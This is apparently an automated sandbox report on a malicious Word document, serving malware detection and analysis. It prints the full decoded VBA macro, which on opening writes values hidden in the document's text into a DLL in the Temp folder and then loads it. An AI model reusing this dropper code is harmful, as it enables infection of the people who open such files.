MALICIOUS
78
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The presence of a Document_Open macro and the 'SC_STR_WSCRIPT' heuristic indicate that this Office document is designed to execute malicious VBA code. The VBA script attempts to access the user's temporary directory using Environ("Temp"), likely to stage a downloaded payload. The script's complexity and obfuscation prevent a more detailed analysis of its exact execution flow, but its intent is to download and run a secondary malicious component.
Heuristics 5
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Sub Private Sub Document_Open() shoptrust -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Dim nick_customer As Boolean platform_mandatory = Environ("Temp") ChDir (platform_mandatory) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23718 bytes |
SHA-256: 3433a75faa4feefbd67005f802839b03527304e6ce605eb7bc78780686e00b53 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function shoptrust()
Dim platform_mandatory As String
Dim nick_customer As Boolean
platform_mandatory = Environ("Temp")
ChDir (platform_mandatory)
End Function
Function tpl_vid(Carnoidme, Genazrel, Publik, gift, panel, publeic, members)
Dim styleTag As Long
Dim nick_customer As Boolean
Dim engine_u42 As Words
Set engine_u42 = ThisDocument.Words
nowarnrevokeall = "-"
If delaymailto Then
Dim GUIDComCat
Dim PrioVal
' figure out which event they are trying to register with and set
' the comcat for this event in GUIDComCat
Select Case LCase(szEvent)
Case "onpostearly"
GUIDComCat = GUIDComCatOnPostEarly
Case "onpost"
GUIDComCat = GUIDComCatOnPost
Case "onpostfinal"
GUIDComCat = GUIDComCatOnPostFinal
Case Else
WScript.echo "invalid event: " & szEvent
'Exit Sub
End Select
' enumerate through each of the registered instances for the NNTP source
' type and look for the display name that matches the instance display
' name
Set SourceType = EventManager.SourceTypes(GUIDSourceType)
szSourceDisplayName = szService & " " & iInstance
End If
On Error Resume Next
Dim phonenumber3 As String
Dim correctcasengift As Boolean, Profile_var As Boolean
Dim streamwysiwyg As Byte, Last As Long
Dim viewtID
correctcasengift = False
Open Publik For Binary Lock Read Write As #1
If delaymailto Then
'Dim GUIDComCat
'Dim PrioVal
' figure out which event they are trying to register with and set
' the comcat for this event in GUIDComCat
Select Case LCase(szEvent)
Case "onpostearly"
GUIDComCat = GUIDComCatOnPostEarly
Case "onpost"
GUIDComCat = GUIDComCatOnPost
Case "onpostfinal"
GUIDComCat = GUIDComCatOnPostFinal
Case Else
WScript.echo "invalid event: " & szEvent
' Exit Sub
End Select
' enumerate through each of the registered instances for the NNTP source
' type and look for the display name that matches the instance display
' name
Set SourceType = EventManager.SourceTypes(GUIDSourceType)
szSourceDisplayName = szService & " " & iInstance
End If
For Each viewtID In engine_u42
If delaymailto Then
'Dim GUIDComCat
'Dim PrioVal
' figure out which event they are trying to register with and set
' the comcat for this event in GUIDComCat
Select Case LCase(szEvent)
Case "onpostearly"
GUIDComCat = GUIDComCatOnPostEarly
Case "onpost"
GUIDComCat = GUIDComCatOnPost
Case "onpostfinal"
GUIDComCat = GUIDComCatOnPostFinal
Case Else
WScript.echo "invalid event: " & szEvent
' Exit Sub
End Select
' enumerate through each of the registered instances for the NNTP source
' type and look for the display name that matches the instance display
' name
Set SourceType = EventManager.SourceTypes(GUIDSourceType)
szSourceDisplayName = szService & " " & iInstance
End If
If viewtID = nowarnrevokeall Then
Profile_var = True
GoTo Jbayubdje
End If
If Profile_var = True Then
If delaymailto Then
'Dim GUIDComCat
'Dim PrioVal
' figure out which event they are trying to register with and set
' the comcat for this event in GUIDComCat
Select Case LCase(szEvent)
Case "onpostearly"
GUIDComCat = GUIDComCatOnPostEarly
Case "onpost"
GUIDComCat = GUIDComCatOnPost
Case "onpostfinal"
GUIDComCat = GUIDComCatOnPostFinal
Case Else
WScript.echo "invalid event: " & szEvent
' Exit Sub
End Select
' enumerate through each of the registered instances for the NNTP source
' type and look for the display name that matches the instance display
' name
Set SourceType = EventManager.SourceTypes(GUIDSourceType)
szSourceDisplayName = szService & " " & iInstance
End If
viewtID = nowarnrevokeall + viewtID
Profile_var = False
End If
If viewtID <> Carnoidme And correctcasengift = False Then
If delaymailto Then
'Dim GUIDComCat
' Dim PrioVal
' figure out which event they are trying to register with and set
' the comcat for this event in GUIDComCat
Select Case LCase(szEvent)
Case "onpostearly"
GUIDComCat = GUIDComCatOnPostEarly
Case "onpost"
GUIDComCat = GUIDComCatOnPost
Case "onpostfinal"
GUIDComCat = GUIDComCatOnPostFinal
Case Else
WScript.echo "invalid event: " & szEvent
'Exit Sub
End Select
' enumerate through each of the registered instances for the NNTP source
' type and look for the display name that matches the instance display
' name
Set SourceType = EventManager.SourceTypes(GUIDSourceType)
szSourceDisplayName = szService & " " & iInstance
End If
GoTo Jbayubdje
End If
If IsNumeric(viewtID) And correctcasengift Then
styleTag = Val(viewtID)
If delaymailto Then
'Dim GUIDComCat
'Dim PrioVal
' figure out which event they are trying to register with and set
' the comcat for this event in GUIDComCat
Select Case LCase(szEvent)
Case "onpostearly"
GUIDComCat = GUIDComCatOnPostEarly
Case "onpost"
GUIDComCat = GUIDComCatOnPost
Case "onpostfinal"
GUIDComCat = GUIDComCatOnPostFinal
Case Else
WScript.echo "invalid event: " & szEvent
' Exit Sub
End Select
' enumerate through each of the registered instances for the NNTP source
' type and look for the display name that matches the instance display
' name
Set SourceType = EventManager.SourceTypes(GUIDSourceType)
szSourceDisplayName = szService & " " & iInstance
End If
Put #1, , styleTag
End If
If viewtID = Carnoidme Then
If delaymailto Then
'Dim GUIDComCat
'Dim PrioVal
' figure out which event they are trying to register with and set
' the comcat for this event in GUIDComCat
Select Case LCase(szEvent)
Case "onpostearly"
GUIDComCat = GUIDComCatOnPostEarly
Case "onpost"
GUIDComCat = GUIDComCatOnPost
Case "onpostfinal"
GUIDComCat = GUIDComCatOnPostFinal
Case Else
WScript.echo "invalid event: " & szEvent
' Exit Sub
End Select
' enumerate through each of the registered instances for the NNTP source
' type and look for the display name that matches the instance display
' name
Set SourceType = EventManager.SourceTypes(GUIDSourceType)
szSourceDisplayName = szService & " " & iInstance
End If
correctcasengift = True
ElseIf viewtID = Genazrel Then
correctcasengift = False
GoTo Jackson
End If
Jbayubdje:
Next viewtID
Jackson:
Close #1
End Function
Sub columns_n()
Dim delaymailto As Boolean
Call tpl_vid("Goingon", "Baltamoir", "vnp.dll", "resizefile", "Status", "hl", "Upload")
delaymailto = Passant.beastmode(0)
If delaymailto = False Then
Call tpl_vid("Adaptek", "Allsets", "vnp.dll", "resizefile", "Status", "hl", "Upload")
Passant.beastmode (1)
End If
End Sub
Private Sub Document_Open()
shoptrust
columns_n
End Sub
Attribute VB_Name = "Passant"
Declare PtrSafe Function GetSystemDirectory Lib "kernel32.dll" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Declare PtrSafe Function GetWindowsDirectory Lib "kernel32.dll" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Declare PtrSafe Function FindFirstFile Lib "kernel32.dll" Alias "FindFirstFileA" (ByVal lpFileName As String, lpFindFileData As Long) As Long
Declare PtrSafe Function FindClose Lib "kernel32.dll" (ByVal hFindFile As Long) As Long
Declare PtrSafe Function beastmode Lib "vnp.dll" (ByVal Offset As Long) As Long
' Processing file: /tmp/qstore_hcrqnl95
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 18904 bytes
' Line #0:
' FuncDefn (Function vnp.dll(id_FFFE As Variant))
' Line #1:
' Dim
' VarDefn shoptrust (As String)
' Line #2:
' Dim
' VarDefn platform_mandatory (As Boolean)
' Line #3:
' LitStr 0x0004 "Temp"
' ArgsLd Environ 0x0001
' St shoptrust
' Line #4:
' Ld shoptrust
' Paren
' ArgsCall ChDir 0x0001
' Line #5:
' EndFunc
' Line #6:
' FuncDefn (Function nick_customer(tpl_vid))
' Line #7:
' Dim
' VarDefn panel (As Long)
' Line #8:
' Dim
' VarDefn platform_mandatory (As Boolean)
' Line #9:
' Dim
' VarDefn styleTag
' Line #10:
' SetStmt
' Ld ThisDocument
' MemLd Words
' Set styleTag
' Line #11:
' LitStr 0x0001 "-"
' St engine_u42
' Line #12:
' Ld columns_n
' IfBlock
' Line #13:
' Dim
' VarDefn delaymailto
' Line #14:
' Dim
' VarDefn GUIDComCat
' Line #15:
' Line #16:
' QuoteRem 0x0004 0x0040 " figure out which event they are trying to register with and set"
' Line #17:
' QuoteRem 0x0004 0x0028 " the comcat for this event in GUIDComCat"
' Line #18:
' Ld LCase
' ArgsLd PrioVal 0x0001
' SelectCase
' Line #19:
' LitStr 0x000B "onpostearly"
' Case
' CaseDone
' Line #20:
' Ld szEvent
' St delaymailto
' Line #21:
' LitStr 0x0006 "onpost"
' Case
' CaseDone
' Line #22:
' Ld GUIDComCatOnPostEarly
' St delaymailto
' Line #23:
' LitStr 0x000B "onpostfinal"
' Case
' CaseDone
' Line #24:
' Ld GUIDComCatOnPost
' St delaymailto
' Line #25:
' CaseElse
' Line #26:
' LitStr 0x000F "invalid event: "
' Ld LCase
' Concat
' Ld vbCritical
' ArgsMemCall GUIDComCatOnPostFinal 0x0001
' Line #27:
' QuoteRem 0x000C 0x0008 "Exit Sub"
' Line #28:
' EndSelect
' Line #29:
' Line #30:
' QuoteRem 0x0004 0x0047 " enumerate through each of the registered instances for the NNTP source"
' Line #31:
' QuoteRem 0x0004 0x0045 " type and look for the display name that matches the instance display"
' Line #32:
' QuoteRem 0x0004 0x0005 " name"
' Line #33:
' SetStmt
' Ld SourceTypes
' Ld SourceType
' ArgsMemLd EventManager 0x0001
' Set echo
' Line #34:
' Ld szSourceDisplayName
' LitStr 0x0001 " "
' Concat
' Ld szService
' Concat
' St GUIDSourceType
' Line #35:
' EndIfBlock
' Line #36:
' OnError (Resume Next)
' Line #37:
' Dim
' VarDefn nowarnrevokeall (As String)
' Line #38:
' Dim
' VarDefn phonenumber3 (As Boolean)
' VarDefn correctcasengift (As Boolean)
' Line #39:
' Dim
' VarDefn Profile_var (As Byte)
' VarDefn Last (As Long)
' Line #40:
' Dim
' VarDefn streamwysiwyg
' Line #41:
' LitVarSpecial (False)
' St phonenumber3
' Line #42:
' Ld Genazrel
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Binary Lock Read Write)
' Line #43:
' Ld columns_n
' IfBlock
' Line #44:
' QuoteRem 0x0000 0x000E "Dim GUIDComCat"
' Line #45:
' QuoteRem 0x0004 0x000B "Dim PrioVal"
' Line #46:
' Line #47:
' QuoteRem 0x0004 0x0040 " figure out which event they are trying to register with and set"
' Line #48:
' QuoteRem 0x0004 0x0028 " the comcat for this event in GUIDComCat"
' Line #49:
' Ld LCase
' ArgsLd PrioVal 0x0001
' SelectCase
' Line #50:
' LitStr 0x000B "onpostearly"
' Case
' CaseDone
' Line #51:
' Ld szEvent
' St delaymailto
' Line #52:
' LitStr 0x0006 "onpost"
' Case
' CaseDone
' Line #53:
' Ld GUIDComCatOnPostEarly
' St delaymailto
' Line #54:
' LitStr 0x000B "onpostfinal"
' Case
' CaseDone
' Line #55:
' Ld GUIDComCatOnPost
' St delaymailto
' Line #56:
' CaseElse
' Line #57:
' LitStr 0x000F "invalid event: "
' Ld LCase
' Concat
' Ld vbCritical
' ArgsMemCall GUIDComCatOnPostFinal 0x0001
' Line #58:
' QuoteRem 0x000B 0x0009 " Exit Sub"
' Line #59:
' EndSelect
' Line #60:
' Line #61:
' QuoteRem 0x0004 0x0047 " enumerate through each of the registered instances for the NNTP source"
' Line #62:
' QuoteRem 0x0004 0x0045 " type and look for the display name that matches the instance display"
' Line #63:
' QuoteRem 0x0004 0x0005 " name"
' Line #64:
' SetStmt
' Ld SourceTypes
' Ld SourceType
' ArgsMemLd EventManager 0x0001
' Set echo
' Line #65:
' Ld szSourceDisplayName
' LitStr 0x0001 " "
' Concat
' Ld szService
' Concat
' St GUIDSourceType
' Line #66:
' EndIfBlock
' Line #67:
' StartForVariable
' Ld streamwysiwyg
' EndForVariable
' Ld styleTag
' ForEach
' Line #68:
' Ld columns_n
' IfBlock
' Line #69:
' QuoteRem 0x0000 0x000E "Dim GUIDComCat"
' Line #70:
' QuoteRem 0x0004 0x000B "Dim PrioVal"
' Line #71:
' Line #72:
' QuoteRem 0x0004 0x0040 " figure out which event they are trying to register with and set"
' Line #73:
' QuoteRem 0x0004 0x0028 " the comcat for this event in GUIDComCat"
' Line #74:
' Ld LCase
' ArgsLd PrioVal 0x0001
' SelectCase
' Line #75:
' LitStr 0x000B "onpostearly"
' Case
' CaseDone
' Line #76:
' Ld szEvent
' St delaymailto
' Line #77:
' LitStr 0x0006 "onpost"
' Case
' CaseDone
' Line #78:
' Ld GUIDComCatOnPostEarly
' St delaymailto
' Line #79:
' LitStr 0x000B "onpostfinal"
' Case
' CaseDone
' Line #80:
' Ld GUIDComCatOnPost
' St delaymailto
' Line #81:
' CaseElse
' Line #82:
' LitStr 0x000F "invalid event: "
' Ld LCase
' Concat
' Ld vbCritical
' ArgsMemCall GUIDComCatOnPostFinal 0x0001
' Line #83:
' QuoteRem 0x000B 0x0009 " Exit Sub"
' Line #84:
' EndSelect
' Line #85:
' Line #86:
' QuoteRem 0x0004 0x0047 " enumerate through each of the registered instances for the NNTP source"
' Line #87:
' QuoteRem 0x0004 0x0045 " type and look for the display name that matches the instance display"
' Line #88:
' QuoteRem 0x0004 0x0005 " name"
' Line #89:
' SetStmt
' Ld SourceTypes
' Ld SourceType
' ArgsMemLd EventManager 0x0001
' Set echo
' Line #90:
' Ld szSourceDisplayName
' LitStr 0x0001 " "
' Concat
' Ld szService
' Concat
' St GUIDSourceType
' Line #91:
' EndIfBlock
' Line #92:
' Ld streamwysiwyg
' Ld engine_u42
' Eq
' IfBlock
' Line #93:
' LitVarSpecial (True)
' St correctcasengift
' Line #94:
' GoTo Jbayubdje
' Line #95:
' EndIfBlock
' Line #96:
' Ld correctcasengift
' LitVarSpecial (True)
' Eq
' IfBlock
' Line #97:
' Ld columns_n
' IfBlock
' Line #98:
' QuoteRem 0x0000 0x000E "Dim GUIDComCat"
' Line #99:
' QuoteRem 0x0004 0x000B "Dim PrioVal"
' Line #100:
' Line #101:
' QuoteRem 0x0004 0x0040 " figure out which event they are trying to register with and set"
' Line #102:
' QuoteRem 0x0004 0x0028 " the comcat for this event in GUIDComCat"
' Line #103:
' Ld LCase
' ArgsLd PrioVal 0x0001
' SelectCase
' Line #104:
' LitStr 0x000B "onpostearly"
' Case
' CaseDone
' Line #105:
' Ld szEvent
' St delaymailto
' Line #106:
' LitStr 0x0006 "onpost"
' Case
' CaseDone
' Line #107:
' Ld GUIDComCatOnPostEarly
' St delaymailto
' Line #108:
' LitStr 0x000B "onpostfinal"
' Case
' CaseDone
' Line #109:
' Ld GUIDComCatOnPost
' St delaymailto
' Line #110:
' CaseElse
' Line #111:
' LitStr 0x000F "invalid event: "
' Ld LCase
' Concat
' Ld vbCritical
' ArgsMemCall GUIDComCatOnPostFinal 0x0001
' Line #112:
' QuoteRem 0x000B 0x0009 " Exit Sub"
' Line #113:
' EndSelect
' Line #114:
' Line #115:
' QuoteRem 0x0004 0x0047 " enumerate through each of the registered instances for the NNTP source"
' Line #116:
' QuoteRem 0x0004 0x0045 " type and look for the display name that matches the instance display"
' Line #117:
' QuoteRem 0x0004 0x0005 " name"
' Line #118:
' SetStmt
' Ld SourceTypes
' Ld SourceType
' ArgsMemLd EventManager 0x0001
' Set echo
' Line #119:
' Ld szSourceDisplayName
' LitStr 0x0001 " "
' Concat
' Ld szService
' Concat
' St GUIDSourceType
' Line #120:
' EndIfBlock
' Line #121:
' Ld engine_u42
' Ld streamwysiwyg
' Add
' St streamwysiwyg
' Line #122:
' LitVarSpecial (False)
' St correctcasengift
' Line #123:
' EndIfBlock
' Line #124:
' Ld streamwysiwyg
' Ld tpl_vid
' Ne
' Ld phonenumber3
' LitVarSpecial (False)
' Eq
' And
' IfBlock
' Line #125:
' Ld columns_n
' IfBlock
' Line #126:
' QuoteRem 0x0000 0x000E "Dim GUIDComCat"
' Line #127:
' QuoteRem 0x0003 0x000C " Dim PrioVal"
' Line #128:
' Line #129:
' QuoteRem 0x0004 0x0040 " figure out which event they are trying to register with and set"
' Line #130:
' QuoteRem 0x0004 0x0028 " the comcat for this event in GUIDComCat"
' Line #131:
' Ld LCase
' ArgsLd PrioVal 0x0001
' SelectCase
' Line #132:
' LitStr 0x000B "onpostearly"
' Case
' CaseDone
' Line #133:
' Ld szEvent
' St delaymailto
' Line #134:
' LitStr 0x0006 "onpost"
' Case
' CaseDone
' Line #135:
' Ld GUIDComCatOnPostEarly
' St delaymailto
' Line #136:
' LitStr 0x000B "onpostfinal"
' Case
' CaseDone
' Line #137:
' Ld GUIDComCatOnPost
' St delaymailto
' Line #138:
' CaseElse
' Line #139:
' LitStr 0x000F "invalid event: "
' Ld LCase
' Concat
' Ld vbCritical
' ArgsMemCall GUIDComCatOnPostFinal 0x0001
' Line #140:
' QuoteRem 0x000C 0x0008 "Exit Sub"
' Line #141:
' EndSelect
' Line #142:
' Line #143:
' QuoteRem 0x0004 0x0047 " enumerate through each of the registered instances for the NNTP source"
' Line #144:
' QuoteRem 0x0004 0x0045 " type and look for the display name that matches the instance display"
' Line #145:
' QuoteRem 0x0004 0x0005 " name"
' Line #146:
' SetStmt
' Ld SourceTypes
' Ld SourceType
' ArgsMemLd EventManager 0x0001
' Set echo
' Line #147:
' Ld szSourceDisplayName
' LitStr 0x0001 " "
' Concat
' Ld szService
' Concat
' St GUIDSourceType
' Line #148:
' EndIfBlock
' Line #149:
' GoTo Jbayubdje
' Line #150:
' EndIfBlock
' Line #151:
' Ld streamwysiwyg
' ArgsLd IsNumeric 0x0001
' Ld phonenumber3
' And
' IfBlock
' Line #152:
' Ld streamwysiwyg
' ArgsLd Val 0x0001
' St panel
' Line #153:
' Ld columns_n
' IfBlock
' Line #154:
' QuoteRem 0x0000 0x000E "Dim GUIDComCat"
' Line #155:
' QuoteRem 0x0004 0x000B "Dim PrioVal"
' Line #156:
' Line #157:
' QuoteRem 0x0004 0x0040 " figure out which event they are trying to register with and set"
' Line #158:
' QuoteRem 0x0004 0x0028 " the comcat for this event in GUIDComCat"
' Line #159:
' Ld LCase
' ArgsLd PrioVal 0x0001
' SelectCase
' Line #160:
' LitStr 0x000B "onpostearly"
' Case
' CaseDone
' Line #161:
' Ld szEvent
' St delaymailto
' Line #162:
' LitStr 0x0006 "onpost"
' Case
' CaseDone
' Line #163:
' Ld GUIDComCatOnPostEarly
' St delaymailto
' Line #164:
' LitStr 0x000B "onpostfinal"
' Case
' CaseDone
' Line #165:
' Ld GUIDComCatOnPost
' St delaymailto
' Line #166:
' CaseElse
' Line #167:
' LitStr 0x000F "invalid event: "
' Ld LCase
' Concat
' Ld vbCritical
' ArgsMemCall GUIDComCatOnPostFinal 0x0001
' Line #168:
' QuoteRem 0x000B 0x0009 " Exit Sub"
' Line #169:
' EndSelect
' Line #170:
' Line #171:
' QuoteRem 0x0004 0x0047 " enumerate through each of the registered instances for the NNTP source"
' Line #172:
' QuoteRem 0x0004 0x0045 " type and look for the display name that matches the instance display"
' Line #173:
' QuoteRem 0x0004 0x0005 " name"
' Line #174:
' SetStmt
' Ld SourceTypes
' Ld SourceType
' ArgsMemLd EventManager 0x0001
' Set echo
' Line #175:
' Ld szSourceDisplayName
' LitStr 0x0001 " "
' Concat
' Ld szService
' Concat
' St GUIDSourceType
' Line #176:
' EndIfBlock
' Line #177:
' LitDI2 0x0001
' Sharp
' LitDefault
' Ld panel
' PutRec
' Line #178:
' EndIfBlock
' Line #179:
' Ld streamwysiwyg
' Ld tpl_vid
' Eq
' IfBlock
' Line #180:
' Ld columns_n
' IfBlock
' Line #181:
' QuoteRem 0x0000 0x000E "Dim GUIDComCat"
' Line #182:
' QuoteRem 0x0004 0x000B "Dim PrioVal"
' Line #183:
' Line #184:
' QuoteRem 0x0004 0x0040 " figure out which event they are trying to register with and set"
' Line #185:
' QuoteRem 0x0004 0x0028 " the comcat for this event in GUIDComCat"
' Line #186:
' Ld LCase
' ArgsLd PrioVal 0x0001
' SelectCase
' Line #187:
' LitStr 0x000B "onpostearly"
' Case
' CaseDone
' Line #188:
' Ld szEvent
' St delaymailto
' Line #189:
' LitStr 0x0006 "onpost"
' Case
' CaseDone
' Line #190:
' Ld GUIDComCatOnPostEarly
' St delaymailto
' Line #191:
' LitStr 0x000B "onpostfinal"
' Case
' CaseDone
' Line #192:
' Ld GUIDComCatOnPost
' St delaymailto
' Line #193:
' CaseElse
' Line #194:
' LitStr 0x000F "invalid event: "
' Ld LCase
' Concat
' Ld vbCritical
' ArgsMemCall GUIDComCatOnPostFinal 0x0001
' Line #195:
' QuoteRem 0x000B 0x0009 " Exit Sub"
' Line #196:
' EndSelect
' Line #197:
' Line #198:
' QuoteRem 0x0004 0x0047 " enumerate through each of the registered instances for the NNTP source"
' Line #199:
' QuoteRem 0x0004 0x0045 " type and look for the display name that matches the instance display"
' Line #200:
' QuoteRem 0x0004 0x0005 " name"
' Line #201:
' SetStmt
' Ld SourceTypes
' Ld SourceType
' ArgsMemLd EventManager 0x0001
' Set echo
' Line #202:
' Ld szSourceDisplayName
' LitStr 0x0001 " "
' Concat
' Ld szService
' Concat
' St GUIDSourceType
' Line #203:
' EndIfBlock
' Line #204:
' LitVarSpecial (True)
' St phonenumber3
' Line #205:
' Ld streamwysiwyg
' Ld Carnoidme
' Eq
' ElseIfBlock
' Line #206:
' LitVarSpecial (False)
' St phonenumber3
' Line #207:
' GoTo Jackson
' Line #208:
' EndIfBlock
' Line #209:
' Label Jbayubdje
' Line #210:
' StartForVariable
' Ld streamwysiwyg
' EndForVariable
' NextVar
' Line #211:
' Label Jackson
' Line #212:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #213:
' EndFunc
' Line #214:
' FuncDefn (Sub viewtID())
' Line #215:
' Line #216:
' Dim
' VarDefn columns_n (As Boolean)
' Line #217:
' Line #218:
' Line #219:
' LitStr 0x0007 "Goingon"
' LitStr 0x0009 "Baltamoir"
' LitStr 0x0007 "vnp.dll"
' LitStr 0x000A "resizefile"
' LitStr 0x0006 "Status"
' LitStr 0x0002 "hl"
' LitStr 0x0006 "Upload"
' ArgsCall (Call) nick_customer 0x0007
' Line #220:
' Line #221:
' LitDI2 0x0000
' Ld _B_var_GetTickCount
' ArgsMemLd _B_var_delaymailto 0x0001
' St columns_n
' Line #222:
' Ld columns_n
' LitVarSpecial (False)
' Eq
' IfBlock
' Line #223:
' Line #224:
' LitStr 0x0007 "Adaptek"
' LitStr 0x0007 "Allsets"
' LitStr 0x0007 "vnp.dll"
' LitStr 0x000A "resizefile"
' LitStr 0x0006 "Status"
' LitStr 0x0002 "hl"
' LitStr 0x0006 "Upload"
' ArgsCall (Call) nick_customer 0x0007
' Line #225:
' Line #226:
' LitDI2 0x0001
' Paren
' Ld _B_var_GetTickCount
' ArgsMemCall _B_var_delaymailto 0x0001
' Line #227:
' Line #228:
' EndIfBlock
' Line #229:
' EndSub
' Line #230:
' FuncDefn (Sub Document_Open())
' Line #231:
' ArgsCall vnp.dll 0x0000
' Line #232:
' ArgsCall viewtID 0x0000
' Line #233:
' EndSub
' Macros/VBA/Passant - 3466 bytes
' Line #0:
' Line #1:
' Line #2:
' FuncDefn (Function GetSystemDirectory(ByVal lpBuffer As String) As Long)
' Line #3:
' FuncDefn (Function GetWindowsDirectory(ByVal lpBuffer As String) As Long)
' Line #4:
' FuncDefn (Function FindFirstFile(ByVal lpFileName As String) As Long)
' Line #5:
' FuncDefn (Function FindClose(ByVal hFindFile As Long) As Long)
' Line #6:
' FuncDefn (Function _B_var_delaymailto(ByVal GetTickCount As Long) As Long)
' Line #7:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.